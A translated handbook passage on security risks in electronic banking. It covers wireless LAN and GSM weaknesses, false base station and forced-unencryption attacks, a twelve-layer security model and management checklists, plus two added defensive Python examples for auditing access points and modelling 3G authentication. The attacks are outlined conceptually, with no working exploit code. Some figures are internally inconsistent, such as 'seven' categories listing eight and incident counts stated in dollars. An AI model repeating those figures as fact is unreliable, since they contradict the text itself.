Alongside the many benefits of the new technology, risks have also arisen, because technology also facilitates new methods of fraud and theft. Problems such as identity forgery, remote access, and high-quality printing of images of securities now exist in the Internet world, and multipurpose tools and platforms make them easier to carry out. With the spread of dial-up ATMs [146], which make it possible to use money in developing regions, criminals are able to tamper with the wireless connection between the ATMs and the parent bank and take over all of the incoming and outgoing exchanges of the dial-up ATM. The art of online intrusion was at first a complex specialty, but the information age has paved the way for the spread of underground hacker websites, which today support computer fraud by offering various tools for penetrating economic infrastructure. For example, sites such as www.astalavista.box.sk or www.attrition.org carry destructive programs and viruses that make it possible for novices to penetrate banking systems. The company Internet Data Center (www.idc.com) recently announced in a report that more than 57% of all attacks last year were aimed at the financial sector.

The traditional risks of past years have been transformed. Throughout history until now, fraud has always involved the misuse of printed documents or the misuse of people, but in the electronic environment new opportunities for economic crime have arisen. In 2001 more than one quarter (27%) of banking and financial databases were breached. [147] Gangs of Eastern European hackers have breached hundreds of banks all over the world. At present, in organized crime, hacking is regarded as a business model.

[146] Dialup ATM
[147] Evans Data Corp. Survey
The FBI's computer crime division has stated that most banks pay the ransom for fear of disgrace and of losing customers. The Egghead extortion last year is a well-known example, in which hackers attacked a database containing ten thousand credit card numbers and demanded a large sum from the company in return for not publishing the numbers in an Internet chat room. After that, on Christmas Eve, they also deducted a small amount from the balance of each card. The problem therefore goes beyond financial and reputational matters. One forecast indicates that identity theft incidents in the United States will more than triple, from 700,000 dollars [148] last year to 1.7 million dollars in 2005, and that the cost to businesses, rising by 30%, will pass 8 million dollars in 2005. [149]

Cybercrime has grown remarkably. Attacks on servers doubled in 2001 compared with 2000, and about 90% of the companies surveyed had been infected by viruses and Internet worms despite having various antivirus tools. [150] The 2001 CSI/FBI survey on computer crime and security showed that intrusions caused more than 377 million dollars in losses. [151]

The main reason that incidents of this kind are not dealt with properly around the world is fear of the news of them spreading. [152] Financial companies, worried about tarnishing their public image, are afraid to report the damage and losses they have suffered, and as a result prefer to remain vulnerable. If it becomes known that a business has been the target of computer fraud, customers may lose their trust and from then on be unwilling to have their information stored in that business's databases. It is essential that providers of financial services control their systems in a way that guarantees their security. The wireless medium, which is expanding all over the world, is not a secure medium. The remarkable haste of countries to adapt to the wireless technology platform has created great confusion.

[148] This statistic represents only the annual trend in the United States.
[149] These results were published in 2001 in a report by Celent Communications, which used FTC data.
[150] http://www.infosecuritymag.com/articles/october01/images/survey.pdf
[151] James Savage, then special agent in the Secret Service's financial crimes division, said: "These statistics point to serious flaws in critical infrastructure, because they mean that the business community is willing to accept that it has been harmed in this respect." He believes that these statistics reflect only a small part of the reality of the harm done to the United States business community. (October 3, 2003)
[152] CERT special agent Cornelius Tate refers to this tendency to avoid reporting incidents as follows: "I think financial losses are greater than what is reported. In my experience there are companies that are unwilling to report the losses that result from being hacked. In my view one can see a large increase from year to year in companies' losses from harm of this kind, because companies have increasingly come to the conclusion that anyone may become the target of an attack, and being the victim of an attack has gradually become accepted, so that publishing news of it no longer causes the loss of public confidence that it once did."

C. Wireless Local Area Networks

Wireless networks are currently available in three forms: wireless local area networks that use the 802.11b protocol; CDMA/TDMA/GSM networks (mobile phone and PCS) used in wireless phones and PDAs; and high-power microwave systems that telephone companies use to exchange information over long distances. Although all three are common around the world, they all share one fundamental security weakness, namely the use of radio frequency (RF) to carry information, since this can lead to disclosure of the data in transit.

Wireless networks have spread explosively. Negligible cost, ease of installation, and always-on connectivity have caused them to spread rapidly, especially in financial services institutions. It was in fact supposed that wireless networks would serve the same purpose as traditional networks but without the use of cables. These networks have spread because of the convenience they offer users, and they are currently offered in the United States under the IEEE 802.11 standard and in Europe under the GSM standard. When wireless networks are designed there are important security concerns that must be taken into account.

Seven primary categories of security risk can be cited for wireless networks: [153]

1. Insertion attacks [154]: The intruder tries to introduce "data" into your network through an insecure mobile access point [155].

2. Session hijacking [156]: Also known as "man in the middle", this arises from the fact that in a wireless phone system the phone authenticates itself to the base station, but the station does not do the same for the phone; a wireless session between the phone and the base station can therefore be hijacked without the phone being able to notice, and for this it is enough to simulate a base station.

3. Jamming: This is a type of denial-of-service attack in which the intruder, by scattering data and broadcasting [157] on the operating frequency of your network, tries to flood [158] the radio frequency spectrum of the wireless network.

4. Encryption attacks [159]: A wireless network based on IEEE 802.11 uses the WEP [160] algorithm for encryption. The encryption method and the initialization vectors of this standard are very weak and have been broken many times.

5. Traffic interception and monitoring: The approximate range of mobile access points in the 802.11b standard is about 300 feet. This means that anyone with suitable equipment who is within range of the transmitted packets will be able to receive them. Devices that amplify the signal and extend this range are also readily available, so the area in which traffic can be captured is wide and securing it is difficult.

6. Mobile node to mobile node communication: Most mobile nodes (such as laptops and PDAs) can communicate directly with one another, without an intermediary, if file sharing or any TCP/IP service is active on them. This means that any mobile node can transfer a dangerous file or program through your network.

7. Misconfiguration: Any device, service, or application that is not configured correctly puts the whole network at risk. Many wireless devices and applications are configured by default to accept any request for service or access. This means that any arbitrary mobile client will be able to request a telnet or ftp session and receive a response.

8. Brute force attacks: Most wireless access points use one shared key or password for all of the devices on the network. This has made wireless networks insecure against brute force attacks (for example, attacks based on a dictionary).

[153] This classification is attributed to a member of the CERT analysis center.
[154] Insertion Attacks
[155] Mobile Access Point
[156] Session Hijacking
[157] Broadcasting
[158] Flooding
[159] Encryption
[160] Wired Equivalent Privacy

War Driving

Industrial espionage and white-collar crime have reached their peak with the advance of new technologies. War dialing, which means calling all of an organization's telephone numbers to find the numbers of its modems, has given way to war driving. This new concept means searching for the wireless local area networks of businesses and recording their network traffic with a laptop. According to Dave Thomas [161], senior investigator in the FBI's computer crime division, war driving is a growing phenomenon that threatens the security of every company and institution that has a wireless local area network.

[161] Dave Thomas

A network administrator who is configuring and deploying a wireless local area network may see that laptops can connect to the network only within a limited distance of the access points, and may therefore assume that the network's signals are not accessible beyond that distance, but this assumption is wrong. In reality the signals can be received over thousands of meters, as long as nothing deflects or interrupts them. The reason for the faulty reasoning is that the small antenna of a laptop cannot pick up weak signals; with an external antenna, however, the range of the signals can be increased. The wireless part of a network is usually such that an intruder does not need physical access to anything in order to reach its traffic. For this reason these networks are weak against attacks such as message theft, message alteration, or jamming between messages.

The issues described above make clear the importance of addressing security in wireless networks. Each of the weaknesses above can be minimized or eliminated through the appropriate use of security policies and practices, network design, security applications, and the correct configuration of security controls. The final chapters of Part Three provide information on how to secure wireless local area networks.
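The closing paragraph above says the listed weaknesses can be reduced through policy and correct configuration; the following is an added example, not part of the handbook, of a small audit that checks a device inventory against the encryption, brute-force, misconfiguration, interception and node-to-node categories. The device records, the wordlist, the field names and the 12-character minimum are assumptions made for illustration.

```python
from dataclasses import dataclass, field

# Constructed wordlist standing in for the dictionary a brute-force check would use.
COMMON_KEYS = {"password", "12345678", "admin123", "wireless", "changeme"}
CLEARTEXT_SERVICES = {"telnet", "ftp"}   # the two services named in the misconfiguration item
MIN_KEY_LENGTH = 12                      # assumed local policy, not a value from the text


@dataclass
class AccessPoint:
    name: str
    encryption: str                      # "none", "wep", or a stronger scheme
    key: str
    services: set = field(default_factory=set)
    accepts_any_request: bool = False    # the accept-everything default described in the text
    signal_range_m: int = 0              # range measured with an external antenna
    site_boundary_m: int = 0             # distance from the access point to the site boundary


@dataclass
class MobileNode:
    name: str
    key: str
    file_sharing: bool = False


def audit_access_point(ap):
    """Return (category, message) findings for one access point."""
    findings = []
    if ap.encryption.lower() in ("none", "wep"):
        findings.append(("encryption", f"{ap.name}: '{ap.encryption}' does not protect traffic"))
    if ap.key.lower() in COMMON_KEYS or len(ap.key) < MIN_KEY_LENGTH:
        findings.append(("brute-force", f"{ap.name}: key is short or appears in the wordlist"))
    exposed = sorted(ap.services & CLEARTEXT_SERVICES)
    if ap.accepts_any_request or exposed:
        detail = ", ".join(exposed) if exposed else "accept-all default"
        findings.append(("misconfiguration", f"{ap.name}: {detail}"))
    if ap.signal_range_m > ap.site_boundary_m:
        overshoot = ap.signal_range_m - ap.site_boundary_m
        findings.append(("interception", f"{ap.name}: receivable {overshoot} m past the boundary"))
    return findings


def audit_nodes(nodes):
    """Flag a single key shared by every node and nodes that expose file sharing."""
    findings = []
    if len(nodes) > 1 and len({n.key for n in nodes}) == 1:
        findings.append(("brute-force", "one key is shared by every device"))
    for node in nodes:
        if node.file_sharing:
            findings.append(("node-to-node", f"{node.name}: file sharing reachable by other nodes"))
    return findings


def audit(access_points, nodes):
    findings = []
    for ap in access_points:
        findings.extend(audit_access_point(ap))
    findings.extend(audit_nodes(nodes))
    return findings


# Constructed inventory: one badly configured access point, one sound one, two clients.
SAMPLE_APS = [
    AccessPoint("branch-ap-1", "wep", "changeme", {"telnet", "http"}, True, 300, 90),
    AccessPoint("branch-ap-2", "wpa2", "k7#Vq9!pLm2@xT4z", {"https"}, False, 60, 90),
]
SAMPLE_NODES = [
    MobileNode("teller-laptop", "changeme", file_sharing=True),
    MobileNode("manager-pda", "changeme"),
]

if __name__ == "__main__":
    for category, message in audit(SAMPLE_APS, SAMPLE_NODES):
        print(f"[{category}] {message}")
```
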
D. The Mobile Phone Standard in Europe: GSM

GSM is the most widespread and fastest-growing digital mobile phone standard in use in the world. At present there are close to 600 million GSM subscribers in the world, which is more than two thirds of the total number of mobile devices in existence. [162] This figure is growing at a rate of four new users per second. GSM coverage spans every continent, and it is the technology used by 400 service providers in more than 170 countries. Yet this is only the beginning of the wireless technology revolution.

Industry researchers forecast that by the end of 2005 there will be about 1.4 billion GSM users. GSM phones contain a small smart card that stores the phone's details and is known as the subscriber identification module (SIM) [163]. The SIM must keep these details confidential and encrypted; the SIM card can therefore be viewed both as a strength and as a security weakness in GSM technology.

[162] The North American GSM system currently operates at 1900MHz when connecting to personal computer services. GSM data services are SMS (Short Message Service), CSD (Analog Cellular Switched Data), and GPRS (General Packet Radio Service). Most mobile phone service providers use a variant of GSM that operates at either 900MHz or 1800MHz. In addition, European countries can use High Speed Circuit Switched Data (HSCSD), which can merge different communication channels into one channel capable of 38.4KBPS. GPRS is available in most countries.
[163] Subscriber Identification Module

GSM Weaknesses

SIM Card Vulnerabilities

In the GSM systems of America and Europe, the method of accessing the network is the same. Removable smart cards in the phones (SIM cards) are used to hold contact numbers, user account information, and ancillary software such as a web browser. The data stored on the cards is encrypted, but the COMP128 algorithm used for this has already been broken, so these cards are not safe from cloning (the making of a duplicate copy). War driving is not a dangerous problem for mobile phone subscribers who use the GSM standard. Regardless of the frequency band, mobile phone signals can easily be disrupted by jamming. There is a very well-known method, which uses a personal computer, for obtaining the encrypted GSM conversation key [164] in less than one second.

[164] Encrypted GSM Conversation Key

The security of GSM technology depends on the circumstances. A SIM card can be cloned. It can also be penetrated, because its sensitive algorithms have been broken. This last problem can also make GSM telephone calls completely insecure.

There are other problems as well when a bank uses GSM technology. For example, if a remote ATM cannot connect to a genuine communications tower, it can be tricked into connecting to a fake tower. Doing this would give the intruder the ability to control the transfers carried out at that ATM.

SMS Vulnerability

GSM also offers short message services (SMS).
SMS [165] has a variety of uses in the GSM system, including voicemail notifications, updating the subscriber's SIM, sending short text messages, and communicating with e-mail gateways. Although these are widely used services, they create new security risks for the network. SMS is a store-and-forward messaging service that is inherently insecure, because all messages in it are exchanged as unencrypted plain text, and they are also stored unencrypted in the SMS center before being forwarded to their destination. Another problem with SMS is delay in delivering the message to its destination. Transactions for which timing matters a great deal cannot rely on this service. In addition, there is a great deal of free software with which one can forge SMS messages, flood handsets and SMS centers with SMS bombs, or craft SMS packets so that they crash the software in most handsets.

SIM Toolkit technology (STK) [166] can be used to encrypt SMS. STK is, however, a transport layer [167] security mechanism and cannot guarantee end-to-end confidentiality [168]. Another procedure for improving SMS security could be for customers to personally verify an agreed segment of the message in order to vouch for the whole message and for the service provider, and consequently to verify customers' registered telephone numbers.

[165] Short Message Service
[166] SIM Toolkit Technology
[167] Transport Layer
[168] End-to-End Confidentiality

GPRS Vulnerability

GPRS [169] is an IP-based service that guarantees a permanent connection to the Internet. The main problem with this mechanism is that it still depends on SMS for WAP requests. A fraudulent SMS packet can be sent to a phone and open a fake website, and deceive users into entering their information into a form that they believe to be secure but that is in fact fraudulent. Many phones that support GPRS also support Bluetooth. Every Bluetooth-capable device has a unique address that allows the user to place a kind of trust in the person at the other end of the connection. Once this identifier has been assigned to a user, the user's activities can be recorded by following messages and checking their identifier. In Bluetooth-based devices, an initialization process is started in order to establish communication, and it uses a PIN for authentication. Although some devices allow you to enter the PIN, the PIN can also be stored in the memory of an electronic device or on a hard disk. If the physical security of the device is not assured, numerous problems may result. In addition, most PINs are four-digit numbers, and in perhaps half of all cases this number is 0000.

The security of Bluetooth depends on keeping the encryption key as a secret shared among the members of the network. But imagine that you and I are having a conversation on our Bluetooth-capable mobile phones. To secure the conversation, I encrypt the conversation data using your key. A little later one of your friends calls you and you use your key again. I, who know your key, can use a forged address to determine the type of encryption and listen to your conversation. I can also pass myself off as you or as the person who is talking to you. Bluetooth therefore authenticates only devices, not users.

[169] General Packet Radio Service

WAP Weaknesses

The weakness common to all of the devices examined, regardless of the type of network, is the Wireless Application Protocol (WAP) [170] standard, which is made up of the Wireless Markup Language (WML) [171] and the Handheld Device Markup Language (HDML) [172]. To make things easier, developers try as far as possible to design scenarios in which the user has to enter the shortest possible input when using the various services, for example the numbers that are entered into the computer as a credit card number or a personal account number. This means that most of this data is still stored on the server, and the handheld device holds only a cookie containing the password, which for tasks such as Internet shopping or transferring funds often needs only a PIN and sometimes not even that. The security of exchanges between devices on the wireless network therefore rests with another standard called Wireless Transport Layer Security (WTLS) [173].

As long as the 128-bit mobile SSL [174] standard or the IPSec protocol (which most handsets do not support because of a lack of bandwidth and processing power) is not used, there is always a weak security link in some part of the network that can be abused. Even when they are used, the security weaknesses inside the device (as opposed to the communication channel) will still exist, and so the security of the communication is easily compromised. GSM uses WAP and WTLS, which is the equivalent of SSL but with a weaker encryption algorithm. WTLS is not compatible with SSL, which is an industry standard. Wireless messages go into a gateway and from there enter a wired network to be routed to their final destination. At that gateway the WTLS message is converted to SSL. At the gateway the message is decrypted for a few seconds, and this makes the whole communication vulnerable to message theft.

[170] Wireless Application Protocol
[171] Wireless Markup Language
[172] Handheld Device Markup Language
[173] Wireless Transport Layer Security
[174] Secure Socket Layer
Security solutions for GSM

The inherent flaws of GSM are not easy to fix. Phones and PDAs that use GSM technology are generally unable to run protective software. Although GSM is not vulnerable to war driving the way its American counterpart, the 802.11 standard, is, it does have several fundamental weaknesses. The 802.11 standard applies to computers rather than handsets, so its security can be improved effectively compared with GSM. Virtual private networks (VPNs) are the point where the vulnerabilities of the two standards meet, and using a VPN is usually regarded as the remedy for the current vulnerabilities of both 802.11 and GSM. Even so, in layered security no single layer can be expected to work miracles. More information on wireless network security can be found at the end of this part of the book and in Part Five (IT Security and Technical Administrators).

F. Banking security practices

As a result of the widespread use of GSM in electronic financial services, a number of control and security standards have emerged that financial institutions must take into account if they use wireless access in payment services.

Payment through a third party

As a general rule, banks should authenticate their customers directly in wireless financial transactions. Some customers may give the bank standing authority to debit their account and credit the accounts of certain third parties. Such arrangements can be made through direct debit authorization agreements. When these agreements are acted on, however, third parties must not be able to obtain or store the customers' banking identifiers (IDs and PINs).

Stored value accounts

Stored value accounts (SVA) are used by customers who periodically deposit money into them. An SVA can reside on a mobile device. No bank account should be accessed while a payment is being carried out. A transfer of funds from a bank account to an SVA must be initiated personally by the holder of that bank account.

Close proximity wireless payments

Close proximity wireless payment services are usually used across a very large number of retail outlets. These transactions should be completed only when the customer has been explicitly authenticated at the point of sale. Without such authentication, the customer's bank account could be unintentionally overdrawn through the associated SVA. Explicit customer authentication must therefore be mandatory for every kind of payment request.

Interactive voice response

Mobile interactive voice response (Mobile IVR) services are vulnerable to eavesdropping. IVR systems should not be used for high-value or high-risk services. All IVR connections, including the caller's telephone number and the sequence of transactions the customer performed, must be logged; these logs must never contain the customer's PIN or authentication information.

Customer education

Banks should educate consumers of wireless electronic financial services in the following ways:

• Customers should be advised to use different PINs for different services.
• Customers should be given instructions on configuring their mobile devices so that mobile banking and payment applications can be used safely.
• Customers should be given the information they need on handling disputes, reporting procedures, and the expected time for complaints to be resolved.

Looking ahead: third-generation technology

Third-generation wireless technology is known as 3G for short and refers to advances in wireless communication across various standards. The primary goal of the effort is to raise transmission speed from 9.5 kilobits per second to 2 megabits per second. Where system and communication security are concerned, the main goal is not to design a flawless system but to design one that can adapt to security advances when the need arises. Many attacks that were possible in second-generation networks, and even in somewhat more advanced ones, have been eliminated entirely in third-generation environments.

Robustness of the third-generation security architecture

Third-generation security is designed on the basis of GSM security, with the following changes:

• One change was made to defeat an attack known as the false base station. In this security mechanism a sequence number is added to the authentication data, which ensures that the mobile device is able to identify the network.
• The cipher key length has been increased so that stronger encryption algorithms can be used.
• Mechanisms have been included to improve security within networks and on the links between them.
• Security is based on the switch rather than on the base station (as in GSM). The links between the base station and the switch are therefore protected.
• The integrity mechanisms for the terminal identity (IMEI) have been designed from scratch rather than carried over from GSM.
• The authentication algorithm is not defined, but guidance is given for choosing one.
• When roaming between networks, for example between GSM and 3GPP, only the level of protection supported by the smart card applies. A GSM smart card in a 3GPP network therefore still has no protection against the false base station attack.

A third-generation system is far more secure than its GSM counterpart. As noted, however, the ingenuity and cunning of attackers should never be underestimated. From a theoretical point of view, serious attacks are therefore possible in third-generation networks as well; they are outlined below.

Trusting a false base station

This attack requires a modified base station or mobile station and exploits the weakness that a user may connect to a false base station. A false base station can act sometimes as a repeater and sometimes as an amplifier for the requests exchanged between the network and the user, and in the process alter the requests or messages of interest.
The security architecture cannot prevent messages exchanged between the network and the user from being tampered with. Protecting the integrity of critical network messages can, however, also help prevent some denial-of-service attacks that work by altering message content. In this case the denial-of-service attack can continue only while the intruder is active, unlike the attacks above, which persist after the intruder's involvement has ended. These attacks are comparable to radio jamming, which is very difficult to counter across all radio systems.

Forcing unencrypted communication

This type of attack also requires a modified base station or mobile station. Once the targeted user trusts the false base station, the attacker places a telephone call to the victim. The user then begins the set-up procedure that the attacker has established between the service provider's network and the user, and the signalling elements are altered so that it appears to the network as though the user does not wish to use encryption for the data exchange. After authentication, the attacker drops the connection to the user and uses the network, on that user's subscription, to place fraudulent calls.

Protecting the integrity of messages can prevent this type of attack. In particular, data authentication and preventing connection requests from being resent indirectly allow the network to verify that requests are legitimate. In addition, sending integrity-protected messages periodically during a connection helps prevent unencrypted connections from being hijacked after the initial set-up. Hijacking a connection between two periodic protected messages remains possible, although it is usually of little use to intruders. In general, connections on which encryption is disabled are always vulnerable to a class of attacks.
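The following added example (not part of the handbook) models in simplified form the two protections described above: a sequence number bound into the authentication data so that the card can verify the network, and integrity-protected signalling so that an altered or resent request is rejected. The class names, the constructed key, and the use of truncated HMAC-SHA256 in place of the operator-chosen 3G functions are assumptions made for illustration.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass


def mac(key: bytes, *fields: bytes) -> bytes:
    # Assumption: truncated HMAC-SHA256 stands in for the operator-chosen
    # authentication and integrity functions (the text says the algorithm
    # itself is not fixed). Fields are length-prefixed to avoid ambiguity.
    framed = b"".join(len(f).to_bytes(2, "big") + f for f in fields)
    return hmac.new(key, framed, hashlib.sha256).digest()[:8]


@dataclass(frozen=True)
class Challenge:
    rand: bytes  # random challenge, as in GSM
    sqn: int     # sequence number added in third-generation authentication
    tag: bytes   # MAC over (rand, sqn): proves the sender holds the subscriber key


class HomeNetwork:
    def __init__(self, key: bytes):
        self.key, self.sqn = key, 0

    def new_challenge(self) -> Challenge:
        self.sqn += 1
        rand = os.urandom(16)
        return Challenge(rand, self.sqn, mac(self.key, rand, self.sqn.to_bytes(6, "big")))


class ThirdGenCard:
    """Card that authenticates the network before answering."""

    def __init__(self, key: bytes):
        self.key, self.highest_sqn = key, 0

    def check_network(self, ch: Challenge) -> str:
        expected = mac(self.key, ch.rand, ch.sqn.to_bytes(6, "big"))
        if not hmac.compare_digest(expected, ch.tag):
            return "reject: network not authenticated"
        if ch.sqn <= self.highest_sqn:
            return "reject: stale sequence number"
        self.highest_sqn = ch.sqn
        return "accept"


class GsmCard:
    """GSM-style card: it answers any challenge, because nothing in a GSM
    challenge lets the card verify who is asking (the roaming caveat above)."""

    def check_network(self, ch: Challenge) -> str:
        return "accept"


def protect(ik: bytes, count: int, message: bytes):
    # Integrity-protected signalling frame: (counter, message, MAC).
    return count, message, mac(ik, count.to_bytes(4, "big"), message)


class SignallingReceiver:
    def __init__(self, ik: bytes):
        self.ik, self.last_count = ik, -1

    def accept(self, frame) -> bool:
        count, message, tag = frame
        valid = hmac.compare_digest(tag, mac(self.ik, count.to_bytes(4, "big"), message))
        if not valid or count <= self.last_count:
            return False  # altered content or a resent frame
        self.last_count = count
        return True


def demo() -> dict:
    key = bytes(range(16))  # constructed subscriber key, shared by card and home network
    net, card3g, card_gsm = HomeNetwork(key), ThirdGenCard(key), GsmCard()
    first = net.new_challenge()
    results = {"genuine": card3g.check_network(first)}
    results["replayed"] = card3g.check_network(first)
    # A station without the subscriber key can only guess the tag.
    forged = Challenge(os.urandom(16), first.sqn + 1, os.urandom(8))
    results["forged"] = card3g.check_network(forged)
    results["gsm_card_forged"] = card_gsm.check_network(forged)

    ik = mac(key, b"integrity-key", first.rand)  # constructed session integrity key
    receiver = SignallingReceiver(ik)
    frame = protect(ik, 0, b"ciphering=supported")
    altered = (frame[0], b"ciphering=unsupported", frame[2])
    results["altered_signalling"] = receiver.accept(altered)
    results["genuine_signalling"] = receiver.accept(frame)
    results["resent_signalling"] = receiver.accept(frame)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:20} {outcome}")
```

The GSM-style card accepting the forged challenge is the roaming limitation noted in the list of changes: the protection applies only at the level the smart card supports.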
We note once again that, depending on how the technology is used, attacks of this kind are all theoretical. On the whole, third-generation systems have advanced in security technology, but supporting the security of mobile communications also requires that other security precautions be observed continuously.

G. Conclusion

The more distributed networks become, the greater the opportunity for eavesdropping and unauthorized access. The greatest exposure to eavesdropping is usually at the points where fiber cables, copper wires, satellite, and terrestrial wireless systems interconnect. Air interface standards are one example of modern telecommunications and information technology systems that can be eavesdropped on.

One possible solution is to revisit the ISO seven-layer communications model, and specifically to create a new layer that provides the necessary security on the basis of an updatable 256-bit or even 1024-bit code. Whether the final solution is a new layer, or whether re-engineering part of the existing layers would give better results, still needs further study. In any case, the risks of wireless financial services remain very high.

The threats that the 802.11 and GSM protocols pose to the confidentiality and integrity of communications can be reduced to a large extent. In addition to using VPNs, protecting gateways and servers is essential. It is very important for banks, alongside using VPNs to establish authorized access, to apply a variety of other methods to protect network resources. Banks and their telecommunications partners should implement layered security mechanisms, especially at the gateway level.
As commerce and the economy make ever greater use of converged and vulnerable technologies, reducing the risks of mobile communication technology becomes more critical. The growing adoption of wireless local area networks and GSM technology by economic institutions has weakened the security of payment and collection systems, even though these penetrable interfaces were never designed for exchanging digital assets. As the trends in electronic financial services continue, "mobile risk management" will become increasingly important to the banking industry in the years ahead.

As Pelton Merge has pointed out, "The market trend has been toward continuous improvement in the quality of unified interface standards, which has made possible the seamless interconnection of different technologies such as fiber, copper wire, terrestrial wireless, satellite, and other emerging technologies; the challenge arises when we try to produce a standard that, while providing reliable and simple communication among these technologies, also provides security."

Chapter Eleven
Best practices: building a security culture

So far, Part Three has examined the role of security and how it functions in different organizations: small and medium-sized organizations, non-profit institutions, schools, and government offices. The discussions of responsibility for organizational security stressed that one person must take on the leadership role, but did not assume that this person would hold a dedicated position such as "chief security officer" (except in large organizations). Small and medium-sized organizations are usually limited in budget and headcount, so it is rarely possible to employ someone as a chief security officer or full-time security specialist. Even so, every company that is involved with technology in some way should have one person, or at most a small group of security specialists, at its disposal. Using consistent regulations, following appropriate standards when preparing reports, and maintaining alert yet friendly relationships with other employees, external contractors, vendors, and customers are all factors that can help this group or individual carry out the activities the organization needs.

This chapter sets out detailed recommendations for applying layered security and presents a twelve-layer security policy. It then gives a selection of security checklists which, by reminding employees and members of the management team of their daily duties toward the safety of the organization, help keep security from being compromised.

Best practices: twelve layers of electronic security [182]

Overview

Security risk management can be seen as a two-sided process. Its first stage is risk assessment, which has three main parts: identifying and inventorying assets, analysing and valuing each asset, and determining, in order of priority, how critical each asset is. The second step is to develop an approach to managing the risks. The main parts of this stage are developing and implementing policies and procedures, educating users (both employees and customers), and auditing and monitoring for quality assurance and control. One sensible view holds: "Accept that you may be attacked, and plan for your survival."

Three general principles should be kept in mind when developing a security program:

• attacks and damage are inevitable;
• achieving security takes time; and
• a network is at most as secure as its weakest component.

To preserve data integrity and reduce risk in open-architecture environments, twelve core layers of security should be considered; experience has shown that implementing any of these layers correctly does not require a huge investment.

1. Information security officer - Creating an information security management position that ensures the other eleven layers are addressed in the organization's policies and implemented correctly according to the best practices below. [183]
2. Risk management - A broad concept, based on CERT's OCTAVE model, for managing assets and the risks associated with them.
3. Access controls and authentication - Verifying that a computer or user is authorized before granting access to the requested information. During this process the user enters a name or account number (identification data) and then a password (authentication data). Access controls are the first line of defence and can be based on passwords, tokens, biometrics, or public key infrastructure.
4. Firewalls - Establishing a system, or a combination of systems, that marks the boundary between two or more networks.
5. Active content filtering - At the web browser level, anything that is not appropriate for the workplace or that conflicts with approved policies should be filtered out.
6. Intrusion detection system (IDS) - A system dedicated to detecting intrusions or intrusion attempts, which may be carried out manually or with the help of software expert systems. It uses log files and other network information. Monitoring methods vary widely depending on factors such as the types of attack the system must be able to defend against, the sources of intrusion, the types of assets, and the level of concern about each threat.
7. Virus scanners - Worms, Trojans, and viruses are all tools for carrying out attacks. A virus is a program that can spread itself by infecting the programs on a system. Trojans do not spread themselves or attach themselves to other files. Virus scanners find destructive and harmful programs and disable them.
8. Encryption - Encryption algorithms are used to protect information that is in transit or exposed to theft (from storage media, for example backup media or a portable computer).

[182] Source: Glaessner, Thomas, Kellerman, Tom, McNevin, "Electronic Security: Risk Mitigation in Financial Transactions - Public Policy Issues", June 2002, The World Bank
[183] For more details, see the following book by Glaessner, Kellerman, and McNevin: "Electronics Security: Risk Mitigation in Financial Transaction"
9. Vulnerability testing - The purpose of this testing is to obtain information about the vulnerabilities present in a computer or network and to use that information to get past the normal authentication barriers and ultimately gain access to the resources of that computer or network.
10. Proper system administration - This should be completed by compiling a list of the common administration errors that typically occur in financial institutions or companies, together with a list of best practices.
11. Policy management software - A software program should check that the policies and procedures written for employees' use of computers are being followed correctly.
12. Incident response plan (IRP) and business continuity plan (BCP) - This is the principal document in which the organization states how it identifies a security incident, responds to it, and repairs the damage. Having an IRP and testing it periodically is one of the most important tools for establishing security.

Executive support checklist [187]

As we saw in earlier chapters, security awareness is key to creating an environment in which employees can cooperate as effectively as possible to protect their organization. Employees are influenced by how managers treat security rules and by how much managers invest in security training, security communication, and related areas. This checklist is intended for company executives who lead the implementation of security policies.

• Is there a clear line of communication from the upper levels of management to front-line staff?
• Does everyone know what that line of communication is and where it is?
• Has responsibility for security been explicitly assigned to one manager, for example the deputy chief executive, the security manager, or another of the organization's managers?
• Has management demonstrated its commitment to the organization's security program by presenting and enforcing it?
• Has adequate investment been made in security programs, and has the corresponding budget actually been allocated?
• Do all administrators of the various systems understand the importance of reporting and quickly resolving security problems?
• Has raising security awareness been adopted as part of the organization's programs for new employees at every level, from front-line staff to senior management?
• Have the necessary steps been taken to make sure employees at all levels are aware of the company's information protection policies?
• Were the realities of company culture (relations between managers and employees) taken into account when the security policies and procedures were written?
• Do employees know whom to ask for help when they encounter security problems (or when they are unsure of their duties)?
• Are security reviews and audits carried out regularly? Every six months? Every year?

Staff responsibilities

To promote a security culture, managers should:

• Emphasize that security is very important at every level of the organization.
• Encourage people to ask questions about security technologies and procedures.
• Ask all staff to be very alert in this regard and to report any unusual activity (in the office or on the network).
• Make clear what is being done to protect the privacy and safety of staff, and make it clear to everyone that loyalty to the organization comes first and that deliberate security breaches cannot be overlooked.
• Explain what the elements of a good security program are.

The following list is designed to help managers train staff to cooperate in securing the organization:

Security training checklist [188]

• Are managers at all levels committed to an organizational security program?
• Have they backed that commitment by investing in security training?
• Does the training program also cover the details of configuring and maintaining security?
• Are there defined policies for security training?
• Are these policies complete and up to date, and are staff aware of them?
• Are management briefings prepared regularly? How often?
• Have all employees (including executives) been trained in their security responsibilities toward the company?
• Is there a framework for developing and sustaining security awareness?

Risk management and control framework

In Chapters Two, Three, and Four we examined common security threats (risk assessment) and described methods for analysing losses, and in the subsequent chapters we presented strategies for developing security policies and procedures that strengthen the organization against attacks and accidental damage. As we saw in those discussions, the response plan includes a list of the results of the practical security evaluation of assets and proposes a range of initial defensive measures. The checklists below give more detail on risk assessment and loss prevention.

Risk review checklist [189]

• Has a risk assessment been carried out recently? How often is it updated?
• Have systems been classified by risk sensitivity (non-sensitive, sensitive, and highly sensitive)?
• Are management objectives based on security principles?
• Are regular audits carried out to test the results of the risk assessment?
• Are auditors from outside the organization used when risks need to be assessed and reduced?
• Have all employees (including managers and system administrators) been evaluated and appointed on the basis of security objectives?

Loss prevention checklist [190]

• Do you know what it is you are trying to protect?
• Has management also been involved in the risk assessment?
• Are the policies written in plain language and easy to understand?
• Does everyone have access to a copy of the policies?
• Does someone personally have explicit responsibility for policies and procedures?
• Does the person responsible for policies attend security conferences and keep his or her security knowledge up to date?
• Do you review periodically to make sure the security mechanisms are still in place?
• Are you sure that everyone who installs your systems has been trained in your company's security policies and procedures?
• Before deploying software and hardware systems, do you make sure that all known security problems have been resolved?
• Do you examine the audit reports? How often?

Physical security: internal and external networks

Physical security is covered at various levels of detail in Part Two (IT Security and Individual Users), Part Three (this part), and Part Five (IT Security and Technical Administrators). From a technical point of view, certain areas must be covered from a security perspective, such as internal networks, external networks, and network access control. The checklists below are designed to help protect the physical resources of a networked environment.

[187] Source: ITS, Chapter 3, Executive Support, p. 50
[188] Source: ITS, Chapter 5, Security Training, p. 81
